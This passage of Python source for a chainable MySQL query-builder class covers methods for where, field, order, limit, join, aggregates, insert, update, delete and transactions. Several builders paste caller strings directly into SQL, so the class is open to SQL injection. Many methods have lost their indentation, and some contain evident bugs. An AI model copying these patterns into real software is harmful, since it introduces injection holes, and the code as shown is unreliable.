        self.whereStringArray = []
        self.whereValueArray = []
        self.SQLerror = {}
        if ConfigID in pythonMySQL.configs:
            # Config already prepared by an earlier instance: connect directly.
            self.init(ConfigID, dbtable)
            return
        if dbConfig == None:
            # NOTE(review): `isset` is not defined in the visible part of this
            # module (PHP-style helper) -- presumably defined elsewhere; confirm.
            if not isset('DB_CONFIG'):
                self.throw_exception("undefined DB_CONFIG", True)
            if ConfigID not in DB_CONFIG:
                # NOTE(review): message is missing a space before 'in config'.
                self.throw_exception(
                    "There is no " + (str(ConfigID) if isinstance(ConfigID, int) else "'" + ConfigID + "'") + "in config", True)
            if ConfigID == 0:
                dbConfig = DB_CONFIG[0]
            else:
                # Non-default entries inherit from entry 0, then override.
                dbConfig = dict(DB_CONFIG[0])
                dbConfig.update(DB_CONFIG[ConfigID])
        if 'DB_DEBUG' in dbConfig:
            if dbConfig['DB_DEBUG'] == True:
                self.dbdebug = True
            # DB_DEBUG is this wrapper's own key; drop it before it reaches
            # mysql.connector.connect(**config).
            del dbConfig['DB_DEBUG']
        if 'password' not in dbConfig:
            if 'password' in DB_CONFIG[0]:
                dbConfig['password'] = DB_CONFIG[0]['password']
            else:
                self.throw_exception('password not be setted')
        # Fill in connection defaults.
        if 'host' not in dbConfig:
            dbConfig['host'] = '127.0.0.1'
        if 'user' not in dbConfig:
            dbConfig['user'] = 'root'
        if 'port' not in dbConfig:
            dbConfig['port'] = '3306'
        if 'autocommit' not in dbConfig:
            dbConfig['autocommit'] = True
        # Cache for subsequent instances, then connect.
        pythonMySQL.configs[ConfigID] = dbConfig
        self.current = ConfigID
        self.config = dbConfig
        self.database = dbConfig['database']
        self.init(self.current, dbtable)
    def init(self, current, dbtable):
        """Open the connection for cached config *current* and bind *dbtable*.

        Raises (via throw_exception) when the table does not exist in the
        configured database.
        """
        self.current = current
        self.config = pythonMySQL.configs[current]
        self.con = mysql.connector.connect(**self.config)
        # Dictionary cursor: rows come back as {column: value} dicts.
        self.cur = self.con.cursor(dictionary=True)
        if 'DB_DEBUG' in self.config and self.config['DB_DEBUG'] == True:
            self.dbdebug = True
        self.database = self.config['database']
        if self.in_db(dbtable):
            self.table_name = dbtable
        else:
            # NOTE(review): message is missing a space before 'not exists'.
            self.throw_exception('table ' + dbtable + 'not exists in ' + self.config['database'])
        self.connected = True
def in_db(self, dbtable):
self.cur.execute('show tables')
tables = self.cur.fetchall()
key = 'Tables_in_' + self.database
for table in tables:
if dbtable == table[key]:
return True
return False
def set_columns(self, dbtable):
self.cur.execute("SHOW COLUMNS FROM `" + dbtable + "`")
columns = self.cur.fetchall()
self.columns = ['', ]
for column in columns:
if column['Key'] == 'PRI':
self.columns[0] = column['Field']
self.columns.append(column['Field'])
def get_columns(self):
return self.cur.column_names
# where("id = 1 and nick = 'frankie'")
# where("id = %d and nick = '%s'", 1, 'frankie')
# where("id = %d and nick = '%s'", (1, 'frankie'))
# where("id = %d and nick = '%s'", [1, 'frankie'])
######
# where({'id':1, 'nick':'frankie'})
# where({'id&nick':"1"}) # WHERE `id`='1' AND `nick`='1'
# where({'id&nick':[1, 'frankie']}) = where({'id&nick':[1, 'frankie', '', 's']})
# where({'id':[1, 2, 3, 'or', 'm']}) # WHERE `id`=1 OR `id`=2 OR `id`=3
# where({'id&nick':[1, 'frankie', 'or', 'm']}) # WHERE (`id`=1 OR `id`='frankie') AND (`nick`=1 OR `nick`='frankie')
def where(self, *where):
param_number = len(where)
if isinstance(where[0], str):
if param_number == 1:
whereSubString = '( ' + where[0] + ' )'
elif param_number > 1:
if isinstance(where[1], tuple):
whereSubString = where[0] % where[1]
elif isinstance(where[1], list):
whereSubString = where[0] % tuple(where[1])
else:
param_array = []
for i in range(1, param_number):
param_array.append(where[i])
whereSubString = where[0] % tuple(param_array)
whereSubString = '( ' + whereSubString + ' )'
elif isinstance(where[0], dict):
whereSubString = self._parseWhereArrayParam(where[0])
else:
self.throw_exception("where condition only accepts dict or string")
self.whereStringArray.append(whereSubString)
return self
def parseWhere(self):
length = len(self.whereStringArray)
if length == 0:
return
if length > 1:
self.whereString = ' WHERE ( ' + self.whereStringArray[0] + ' )'
for i in range(1, length):
self.whereString += ' AND ( ' + self.whereStringArray[i] + ' )'
else:
self.whereString = ' WHERE ' + self.whereStringArray[0]
# table('table_name') | table('table_name AS t') | table('database.table_name AS t1')
# table({'table_name':'', 'table_name':'t', 'database.table_name':'t1'})
def table(self, table):
if isinstance(table, str):
self.tmp_table = table
elif isinstance(table, dict):
if len(table) == 0:
self.throw_exception('no table selected')
self.tmp_table = ''
for key, val in table.items():
if val != '':
strpos = key.find('.')
if strpos == -1:
self.tmp_table += '`' + key.strip() + '` AS `' + val.strip() + '`,'
else:
self.tmp_table += key.strip() + ' AS `' + val.strip() + '`,'
else:
strpos = key.find('.')
if strpos == -1:
self.tmp_table += '`' + key.strip() + '`,'
else:
self.tmp_table += key.strip() + ','
self.tmp_table = self.tmp_table.rstrip(',')
else:
self.throw_exception('table condition input error:"' + table + '"')
return self
def alias(self, alias):
self.aliasString = ' AS `' + alias + '`'
return self
# field() | field('') | field('*') | field(True) | field('id,username as name, db.pass')
# field({'id':'', 'username':'name', 'db.pass':''})
# field('sex,head', True) | field(('sex', 'head'), True)
    def field(self, field='', filter=False):
        """Build the SELECT column list.

        field=True expands to every column of the table; '' or '*' selects
        all; a comma string or a {column: alias} dict names columns
        explicitly. With filter=True, *field* lists columns to EXCLUDE.

        NOTE(review): fieldString is appended to (+=) in several branches, so
        calling field() twice on one chain concatenates -- confirm intended.
        """
        if field == True:
            # Expand to the explicit, backquoted column list of the table.
            self.set_columns(self.table_name if not self.tmp_table else self.tmp_table)
            self.fieldString += ' '
            columns_array = self.columns
            # Drop slot 0: set_columns stores the primary key there as a duplicate.
            columns_array.pop(0)
            for column in columns_array:
                self.fieldString += '`' + column + '`,'
            self.fieldString = self.fieldString.rstrip(',')
            return self
        if filter:
            if not isinstance(field, (str, set, list, tuple)):
                self.throw_exception("filter only accepts set、list、tuple")
            self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
            columns_list = self.columns
            columns_list.pop(0)
            # Index the real columns so excluded ones can be popped by key.
            columns_dict = {}
            for index, item in enumerate(columns_list):
                columns_dict[str(index)] = item
            explode_array = []
            if isinstance(field, str):
                # Split on commas with optional surrounding whitespace.
                explode_array = re.split('\s{0,},\s{0,}', field.strip())
            else:
                for single_field in field:
                    explode_array.append(single_field.strip())
            for index, item in list(columns_dict.items()):
                if item in explode_array:
                    columns_dict.pop(index)
            for index, item in columns_dict.items():
                self.fieldString += '`' + item + '`,'
            self.fieldString = ' ' + self.fieldString.rstrip(',')
            return self
        if field == '' or field == '*':
            self.fieldString = ' *'
            return self
        if isinstance(field, str):
            field_array = field.split(',')
            # _addSpecialChar is defined further down this class (not visible
            # here); presumably it backquotes the name -- confirm.
            field_array = list(map(self._addSpecialChar, field_array))
            self.fieldString = ','.join([item for item in field_array])
        elif isinstance(field, dict):
            # {column: alias}; '' alias means no AS clause.
            for key, val in field.items():
                if val == '':
                    after_process_key = self._addSpecialChar(key)
                    self.fieldString += after_process_key + ','
                else:
                    after_process_key = self._addSpecialChar(key)
                    after_process_val = self._addSpecialChar(val)
                    self.fieldString += after_process_key + ' AS ' + after_process_val + ','
            self.fieldString = self.fieldString.rstrip(',')
        else:
            self.throw_exception("field condition only suport dict")
        self.fieldString = ' ' + self.fieldString
        return self
def order(self, order):
if isinstance(order, str):
self.orderString = ' ORDER BY ' + order
elif isinstance(order, dict):
self.orderString = ' ORDER BY '
for key, val in order.items():
if val == '':
self.orderString += '`' + key.strip() + '`,'
else:
if val.lower() != 'asc' and val.lower() != 'desc':
self.throw_exception("please use asc or desc in order,default is asc,unknow sort method detected")
self.orderString += '`' + key.strip() + '` ' + val + ','
self.orderString = self.orderString.rstrip(',')
else:
self.throw_exception("order condition only accepts dict or string")
return self
def limit(self, *limit):
param_number = len(limit)
if param_number == 1:
if not isinstance(limit[0], (int, str)):
self.throw_exception("illegal limit query")
if isinstance(limit[0], str):
if not re.match('^\d+\s{0,},\s{0,}\d+$', limit[0].strip()) and not re.match('^\d+$', limit[0].strip()):
self.throw_exception("illegal limit query")
self.limitString = ' LIMIT ' + str(limit[0])
elif param_number == 2:
for i in range(2):
if not is_numeric(limit[i]):
self.throw_exception("illegal limit query")
self.limitString = ' LIMIT ' + str(limit[0]) + ',' + str(limit[1])
else:
self.throw_exception("limit condition need 1 argument at least, 2 arguments at most")
return self
def page(self, page_number, amount):
if not is_numeric(page_number) or not is_numeric(amount):
self.throw_exception("page need input page_number and count in every page")
start = (int(page_number) - 1) * int(amount)
self.limitString = ' LIMIT ' + str(start) + ',' + str(amount)
return self
def group(self, group):
if not isinstance(group, str):
self.throw_exception("group only accepts string")
self.groupString = ' GROUP BY ' + group
return self
def having(self, having):
if not isinstance(having, str):
self.throw_exception("having only accepts string")
self.havingString = ' HAVING BY ' + having
return self
def join(self, join):
if isinstance(join, str):
self.joinString += ' INNER JOIN ' + join
elif isinstance(join, (list, tuple)):
if len(join) != 2:
self.throw_exception("join condition need 2 arguments at least")
self.joinString += ' ' + join[1] + ' JOIN ' + join[0]
else:
self.throw_exception("join only accepts str、list、tuple")
return self
    def fetchSql(self, fetchSql=True):
        """Toggle fetch-SQL mode: when set, builders return the SQL text
        instead of executing it (checked as ``self.fetchSql == True``)."""
        # NOTE(review): this method name collides with the class attribute
        # ``fetchSql = False`` declared above -- the def shadows the flag on
        # the class, and the first call replaces the method with a bool on
        # the instance, so it cannot be called twice. Verify intent.
        self.fetchSql = fetchSql
        return self
def count(self, field='*'):
self.fieldString = ' COUNT(' + field + ') AS f_count'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_count']
def max(self, field):
self.fieldString = ' MAX(' + field + ') AS f_max'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_max']
def min(self, field):
self.fieldString = ' MIN(' + field + ') AS f_min'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_min']
def avg(self, field):
self.fieldString = ' AVG(' + field + ') AS f_avg'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_avg']
def sum(self, field):
self.fieldString = ' SUM(' + field + ') AS f_sum'
self.limitString = ' LIMIT 1'
is_fetchSql = False
if self.fetchSql == True:
is_fetchSql = True
res = self.select()
if is_fetchSql:
return res
else:
return res[0]['f_sum']
    def buildSql(self):
        """Return the parenthesized SELECT for the current chain as text,
        without executing it (e.g. for use as a subquery).

        Placeholders are substituted via _replaceSpecialChar and the chain
        state is reset afterwards (_clearSubString); both helpers are
        defined further down this class, outside the visible excerpt.
        """
        sqlString = ''
        if self.tmp_table != '':
            table_name = self.tmp_table + self.aliasString
        else:
            table_name = '`' + self.table_name + '`' + self.aliasString
        self.fieldString = ' *' if self.fieldString == '' else self.fieldString
        self.parseWhere()
        sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
        # Substitute the collected values for the %s placeholders.
        buildSql = self._replaceSpecialChar('%s', self.whereValueArray, sqlString)
        self._clearSubString()
        return '( ' + buildSql + ' )'
def find(self, primary_key_value=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if primary_key_value != '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
self.whereStringArray.append('`' + self.columns[0] + '` = %s')
self.whereValueArray.append(primary_key_value)
self.limitString = ' LIMIT 1'
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
res = self.query(sqlString, True)
return res
def select(self, query=True):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
self.fieldString = ' *' if self.fieldString == '' else self.fieldString
self.parseWhere()
sqlString += 'SELECT' + self.fieldString + ' FROM ' + table_name + self.joinString + self.whereString + self.groupString + self.havingString + self.orderString + self.limitString
if query == False:
self.fetchSql = True
res = self.query(sqlString)
return res
def add(self, data=''):
field_str = ''
if data != '':
if not isinstance(data, dict):
self.throw_exception('add only accepts dict')
length = len(data)
if length == 0:
placeholder = ''
else:
for key, val in data.items():
field_str += '`' + key + '`,'
self.whereValueArray.append(val)
field_str = field_str.rstrip(',')
placeholder = '%s'
for i in range(1, length):
placeholder += ',%s'
else:
placeholder = ''
if self.tmp_table != '':
table_name = self.tmp_table
else:
table_name = '`' + self.table_name + '`'
sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES (' + placeholder + ')'
res = self.execute(sqlString)
if isinstance(res, str) or res == False:
return res
self.lastInsertId = self.cur.lastrowid
return self.lastInsertId
    def addAll(self, dataList):
        """INSERT many rows at once; *dataList* is a list/tuple of dicts.

        The first dict fixes the column list; every following dict must
        provide the same keys. Returns lastrowid (or the SQL text / False
        propagated from execute()).
        """
        if not isinstance(dataList, (list, tuple)):
            self.throw_exception('addAll only accepts list、tuple')
        field_str = ''
        fieldList = []
        number = len(dataList)
        valueListStr = ''
        if number == 0:
            self.throw_exception('addAll not accepts empty dict')
        if not isinstance(dataList[0], dict):
            self.throw_exception('the argument in the addAll method must be a list or tuple consisting of a dictionary')
        number_field = len(dataList[0])
        if number_field == 0:
            # Degenerate case: rows with no columns -> "(),(),...".
            valueListStr += '()'
            for i in range(1, number):
                if not isinstance(dataList[i], dict):
                    self.throw_exception('the argument in the addAll method must be a list or tuple consisting of a dictionary')
                valueListStr += ',()'
        else:
            # Build "(%s,%s,...)" once from the first row's keys...
            valueStr = '('
            for key, val in dataList[0].items():
                fieldList.append(key)
                self.whereValueArray.append(val)
                field_str += key + ','
                valueStr += '%s,'
            field_str = field_str.rstrip(',')
            valueStr = valueStr.rstrip(',')
            valueStr += ')'
            valueListStr += valueStr
            # ...then queue the remaining rows' values in the same key order.
            for i in range(1, number):
                for j in range(number_field):
                    self.whereValueArray.append(dataList[i][fieldList[j]])
                valueListStr += ',' + valueStr
        if self.tmp_table != '':
            table_name = self.tmp_table
        else:
            table_name = '`' + self.table_name + '`'
        sqlString = 'INSERT INTO ' + table_name + ' (' + field_str + ') VALUES ' + valueListStr
        res = self.execute(sqlString)
        if isinstance(res, str) or res == False:
            return res
        self.lastInsertId = self.cur.lastrowid
        return self.lastInsertId
def setField(self, *field):
param_number = len(field)
if field == 0:
self.throw_exception('setField condition is empty')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if isinstance(field[0], dict) and self.columns[0] != '' and self.columns[0] in field[0]:
if isinstance(field[0][self.columns[0]], (list, tuple)):
if field[0][self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns[0] + '` = ' + field[0][self.columns[0]][1].strip()
else:
self.throw_exception('setField only accepts EXP')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(field[0][self.columns[0]])
del field[0][self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('there are no update conditions, and the specified data table has no primary key and is not allowed to perform update operations')
else:
self.throw_exception('there are no update conditions, the data object itself does not contain a primary key field, and is not allowed to perform update operations')
setFieldStr = ''
updateValueArray = []
if isinstance(field[0], str):
if param_number != 2:
self.throw_exception('the setField clause receives two parameters (property name, attribute value)')
if field[0].find('.') == -1:
setFieldStr += '`' + field[0].strip() + '` = %s'
else:
setFieldStr += field[0].strip() + ' = %s'
updateValueArray.append(field[1])
elif isinstance(field[0], dict):
if param_number != 1:
self.throw_exception('the setField only accepts dict')
for key, val in field[0].items():
if isinstance(val, (list, tuple)):
if val[0].upper() == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('setField only accepts EXP')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
else:
self.throw_exception('setField argument input error:' + field[0])
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def setInc(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' + ' + str(value)]
return self.save(data)
def setDec(self, field, value=1):
data = {}
data[field] = ['EXP', field + ' - ' + str(value)]
return self.save(data)
def save(self, data):
if not isinstance(data, dict):
self.throw_exception('save only accepts dict')
self.parseWhere()
if self.whereString == '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
if self.columns[0] != '' and self.columns[0] in data:
if isinstance(data[self.columns[0]], (list, tuple)):
if data[self.columns[0]][0].upper() == 'EXP':
self.whereString = ' WHERE `' + self.columns['PRI'] + '` = ' + data[self.columns[0]][1].strip()
else:
self.throw_exception('save only accepts EXP')
else:
self.whereString = ' WHERE `' + self.columns[0] + '` = %s'
self.whereValueArray.append(data[self.columns[0]])
del data[self.columns[0]]
elif self.columns[0] == '':
self.throw_exception('there are no update conditions, and the specified data table has no primary key and is not allowed to perform update operations')
else:
self.throw_exception('there are no update conditions, the data object itself does not contain a primary key field, and is not allowed to perform update operations')
setFieldStr = ''
updateValueArray = []
for key, val in data.items():
if isinstance(val, (list, tuple)):
if val[0].upper == 'EXP':
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = ' + val[1].strip() + ','
else:
setFieldStr += key.strip() + ' = ' + val[1].strip() + ','
else:
self.throw_exception('save only accepts EXP')
else:
if key.find('.') == -1:
setFieldStr += '`' + key.strip() + '` = %s,'
else:
setFieldStr += key.strip() + ' = %s,'
updateValueArray.append(val)
setFieldStr = setFieldStr.rstrip(',')
self.whereValueArray = updateValueArray + self.whereValueArray
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
sqlString = 'UPDATE ' + table_name + self.joinString + ' SET ' + setFieldStr + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def delete(self, table=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if table != '':
table = ' ' + table
self.parseWhere()
if self.whereString == '':
if self.joinString == '' or self.joinString.upper().find(' ON ') == -1:
self.throw_exception('no condition find, this operation not be allowed')
sqlString = 'DELETE' + table + ' FROM ' + table_name + self.joinString + self.whereString + self.orderString + self.limitString
res = self.execute(sqlString)
return res
def deleteById(self, primary_key_value, table=''):
sqlString = ''
if self.tmp_table != '':
table_name = self.tmp_table + self.aliasString
else:
table_name = '`' + self.table_name + '`' + self.aliasString
if table != '':
table = ' ' + table
if primary_key_value != '':
self.set_columns(self.table_name if self.tmp_table == '' else self.tmp_table)
self.whereStringArray.append('`' + self.columns[0] + '` = %s')
self.whereValueArray.append(primary_key_value)
self.parseWhere()
sqlString = 'DELETE' + table + ' FROM ' + table_name + self.joinString + self.whereString
res = self.execute(sqlString)
return res
    def query(self, queryStr, is_find=False):
        """Run a SELECT-style statement and fetch its rows.

        In fetch-SQL mode the interpolated SQL text is returned instead of
        being executed. *is_find* switches fetchone/fetchall. DB errors are
        routed through haveErrorThrowException (defined further down).
        """
        if not isinstance(queryStr, str):
            self.throw_exception('query can only deal with string')
        if self.fetchSql == True:
            buildSql = self._replaceSpecialChar('%s', self.whereValueArray, queryStr)
            self._clearSubString()
            return buildSql
        try:
            # Keep the fully interpolated SQL for getLastSql() *before*
            # the chain state is cleared.
            self.queryStr = self._replaceSpecialChar('%s', self.whereValueArray, queryStr)
            # NOTE(review): assumes _clearSubString rebinds (rather than
            # mutates) whereValueArray, else tmp would empty too -- confirm.
            tmp_whereValueArray = self.whereValueArray
            self._clearSubString()
            # Parameterized execution: values go to the driver, not the string.
            if len(tmp_whereValueArray) > 0:
                self.cur.execute(queryStr, tmp_whereValueArray)
            else:
                self.cur.execute(queryStr)
            if is_find == True:
                res = self.cur.fetchone()
            else:
                res = self.cur.fetchall()
            return res
        except mysql.connector.Error as err:
            return self.haveErrorThrowException(err)
    def execute(self, execStr):
        """Run a write statement (INSERT/UPDATE/DELETE) and return rowcount.

        In fetch-SQL mode the interpolated SQL text is returned instead of
        being executed. DB errors are routed through haveErrorThrowException
        (defined further down this class).
        """
        if not isinstance(execStr, str):
            self.throw_exception('execute can only deal with string')
        if self.fetchSql == True:
            buildSql = self._replaceSpecialChar('%s', self.whereValueArray, execStr)
            self._clearSubString()
            return buildSql
        try:
            # Keep the fully interpolated SQL for getLastSql() *before*
            # the chain state is cleared.
            self.queryStr = self._replaceSpecialChar('%s', self.whereValueArray, execStr)
            tmp_whereValueArray = self.whereValueArray
            self._clearSubString()
            # Parameterized execution: values go to the driver, not the string.
            if len(tmp_whereValueArray) > 0:
                self.cur.execute(execStr, tmp_whereValueArray)
            else:
                self.cur.execute(execStr)
            self.numRows = self.cur.rowcount
            return self.numRows
        except mysql.connector.Error as err:
            return self.haveErrorThrowException(err)
# If consistent_snapshot is True, Connector/Python sends WITH CONSISTENT SNAPSHOT with the statement. MySQL ignores this for isolation levels for which that option does not apply.
# isolation_level: permitted values are 'READ UNCOMMITTED', 'READ COMMITTED', 'REPEATABLE READ', and 'SERIALIZABLE'
# The readonly argument can be True to start the transaction in READ ONLY mode or False to start it in READ WRITE mode. If readonly is omitted, the server's default access mode is used.
    def startTrans(self, consistent_snapshot=False, isolation_level=None, readonly=False):
        """Start a transaction on every tracked connection.

        NOTE(review): ``pythonMySQL.links`` is not defined anywhere in the
        visible part of this class (only ``configs`` is) -- confirm it is
        assigned elsewhere, otherwise this raises AttributeError.
        """
        for link in pythonMySQL.links.values():
            link.start_transaction(consistent_snapshot, isolation_level, readonly)
def inTrans(self):
return self.con.in_transaction
    def rollback(self):
        """Roll back the open transaction on every tracked connection.

        NOTE(review): ``pythonMySQL.links`` is not defined in the visible
        part of this class -- confirm (see startTrans).
        """
        for link in pythonMySQL.links.values():
            link.rollback()
    def commit(self):
        """Commit the open transaction on every tracked connection.

        NOTE(review): ``pythonMySQL.links`` is not defined in the visible
        part of this class -- confirm (see startTrans).
        """
        for link in pythonMySQL.links.values():
            link.commit()
def getLastSql(self):
if not self.dbdebug:
self.throw_exception('please set DEBUG to True')
return self.queryStr
def _sql(self):
return self.cur.statement
def _parseWhereArrayParam(self, whereArrayParam):
logic = ' AND '
whereSubString = ''
if '_complex' in whereArrayParam:
whereSubString = '( ' + self._parseWhereArrayParam(whereArrayParam['_complex']) + ' )'
del whereArrayParam['_complex']
if '_logic' in whereArrayParam:
if whereArrayParam['_logic'].upper() in self.SQL_logic:
logic = ' ' + whereArrayParam['_logic'].upper() + ' '
else:
self.throw_exception('_logic in _query is not supported:"' + whereArrayParam['_logic'] + '"')
del whereArrayParam['_logic']
if '_string' in whereArrayParam:
whereSubString += logic + '( ' + whereArrayParam['_string'] + ' )'
del whereArrayParam['_string']
if '_query' in whereArrayParam:
explode_query = whereArrayParam['_query'].split('&')
explode_array = {}
for key_val in explode_query:
explode_sub_query = key_val.split('=')
explode_array[explode_sub_query[0]] = explode_sub_query[1]
if '_logic' in explode_array:
if explode_array['_logic'].upper() in self.SQL_logic:
sub_logic = ' ' + explode_array['_logic'].upper() + ' '
else:
self.throw_exception('_logic in _query is not supported:"' + explode_array['_logic'] + '"')
del explode_array['_logic']
querySubString = ''
for key, val in explode_array.items():
start = key.find('.')
if start != -1:
querySubString += sub_logic + key + " = '" + val + "'"
else:
querySubString += sub_logic + "`" + key + "` = '" + val + "'"
querySubString = querySubString.lstrip(sub_logic)
whereSubString += logic + '( ' + querySubString + ' )'
del whereArrayParam['_query']
for key, val in whereArrayParam.items():
whereArraySubString = ''
have_and = key.find('&')
have_or = key.find('|')
if isinstance(val, (list, tuple)):
if have_and == -1 and have_or == -1:
whereArraySubString += self._singleKey2Array(key, val)
elif (have_and != -1 and have_or == -1) or (have_and == -1 and have_or != -1):
if have_and != -1:
string_logic = '&'
sub_logic = ' AND '
else:
string_logic = '|'
sub_logic = ' OR '
explode_array = key.split(string_logic)
signal = 1
if len(explode_array) == len(val):
signal = 1
else:
if val[-1] == '' or val[-1] == 's':
signal = 1
elif val[-1] == 'm':
signal = 2
elif val[-1] == 'e':
signal = 3
else:
self.throw_exception('this query method is not supported:"' + val[-1] + '"')
if signal == 1:
index = 0
for explode_val in explode_array:
if isinstance(val[index], (list, tuple)):
whereArraySubString += self._singleKey2Array(explode_val, val[index])
else:
start = explode_val.find('.')
if start != -1:
whereArraySubString += sub_logic + explode_val + " = %s"
else:
whereArraySubString += sub_logic + "`" + explode_val + "` = %s"
self.whereValueArray.append(val[index])
index += 1
elif signal == 2:
for explode_val in explode_array:
get_parseMultiQuery = self._parseMultiQuery(explode_val, val)
whereArraySubString += sub_logic + get_parseMultiQuery
else:
for explode_val in explode_array:
get_parseExpQuery = self._parseExpQuery(explode_val, val)
whereArraySubString += sub_logic + get_parseExpQuery
whereArraySubString = whereArraySubString.lstrip(sub_logic)
whereArraySubString = '( ' + whereArraySubString + ' )'
else:
self.throw_exception('"|" and "&" cannot be used in the same time')
else:
start = key.find('.')
if have_and == -1 and have_or == -1:
if start != -1:
whereArraySubString += key + " = %s"
else:
whereArraySubString += "`" + key + "` = %s"
self.whereValueArray.append(val)
elif (have_and != -1 and have_or == -1) or (have_and == -1 and have_or != -1):
if have_and != -1:
string_logic = '&'
sub_logic = ' AND '
else:
string_logic = '|'
sub_logic = ' OR '
explode_array = key.split(string_logic)
whereArraySubString = ''
for explode_val in explode_array:
start = explode_val.find('.')
if start != -1:
whereArraySubString += sub_logic + explode_val + " = %s"
else:
whereArraySubString += sub_logic + "`" + explode_val + "` = %s"
self.whereValueArray.append(val)
whereArraySubString = whereArraySubString.lstrip(sub_logic)
whereArraySubString = '( ' + whereArraySubString + ' )'
else:
self.throw_exception('"|" and "&" cannot be used in the same time')
whereSubString += logic + whereArraySubString
whereSubString = whereSubString.lstrip(logic)
return whereSubString
def _singleKey2Array(self, key, array):
if array[-1] == '' or array[-1] == 'm':
return self._parseMultiQuery(key, array)
elif array[-1] == 'e':
return self._parseExpQuery(key, array)
else:
self.throw_exception('this query method is not supported"' + array[-1] + '"')
def _parseExpQuery(self, column, array):
expQueryString = ''
start = column.find('.')
specialChar_index = column.find('`')
if specialChar_index == -1 and start == -1:
column = '`' + column + '`'
exp_type = array[0].upper()
if exp_type == "EQ":
expQueryString += column + ' = %s'
self.whereValueArray.append(array[1])
elif exp_type == "NEQ":
expQueryString += column + ' <> %s'
self.whereValueArray.append(array[1])
elif exp_type == "GT":
expQueryString += column + ' > %s';
self.whereValueArray.append(array[1])
elif exp_type == "EGT":
expQueryString += column + ' >= %s';
self.whereValueArray.append(array[1])
elif exp_type == "LT":
expQueryString += column + ' < %s';
self.whereValueArray.append(array[1])
elif exp_type == "ELT":
expQueryString += column + ' <= %s';
self.whereValueArray.append(array[1])
elif exp_type == "LIKE" or exp_type == "NOTLIKE" or exp_type == "NOT LIKE":
if exp_type == "LIKE":
string = ' LIKE '
else:
string = ' NOT LIKE '
if isinstance(array[1], (list, tuple, set)):
logic = ' AND '
if array[2] != '':
if array[2].upper() in self.SQL_logic:
logic = ' ' + array[2].upper() + ' '
else:
self.throw_exception('the logical operators in [NOT] LIKE"' + array[2] + '"is not supported')
for val in array[1]:
expQueryString += logic + column + string + ' %s'
self.whereValueArray.append(str(val))
expQueryString = expQueryString.lstrip(logic)
expQueryString = '( ' + expQueryString + ' )'
elif isinstance(array[1], str):
expQueryString += column + string + ' %s'
self.whereValueArray.append(array[1])
else:
self.throw_exception('the 2rd params of [NOT] LIKE need to be str、list、tuple、set')
elif exp_type == "BETWEEN" or exp_type == "NOTBETWEEN" or exp_type == "NOT BETWEEN":
# example array('between','1,8') | array('between',1,8) | array('between',array('1','8'))
if exp_type == "BETWEEN":
string = ' BETWEEN '
else:
string = ' NOT BETWEEN '
expQueryString += column + string + '%s AND %s'
if isinstance(array[1], (list, tuple)):
self.whereValueArray.append(array[1][0])
self.whereValueArray.append(array[1][1])
elif isinstance(array[1], str):
explode_array = array[1].split(',')
if len(explode_array) != 2:
self.throw_exception('error param after [NOT]BETWEEN:' + array[1])
self.whereValueArray.append(explode_array[0].strip())
self.whereValueArray.append(explode_array[1].strip())
elif is_numeric(array[1]):
if not is_numeric(array[2]):
self.throw_exception('error param after [NOT]BETWEEN(two number expected)');
self.whereValueArray.append(array[1])
self.whereValueArray.append(array[2])
else:
self.throw_exception('error param after [NOT]BETWEEN:' + array[1])
elif exp_type == "IN" or exp_type == "NOTIN" or exp_type == "NOT IN":
# example:array('not in',array('a','b','c')) | array('not in','a,b,c')
if exp_type == "IN":
string = ' IN '
else:
string = ' NOT IN '
if isinstance(array[1], (list, tuple)):
length = len(array[1])
if length == 0:
self.throw_exception('empty array detected in param after [NOT]IN:array()')
expQueryString += column + string + '('
expQueryString += '%s'
self.whereValueArray.append(array[1][0])
for i in range(1, length):
expQueryString += ',%s'
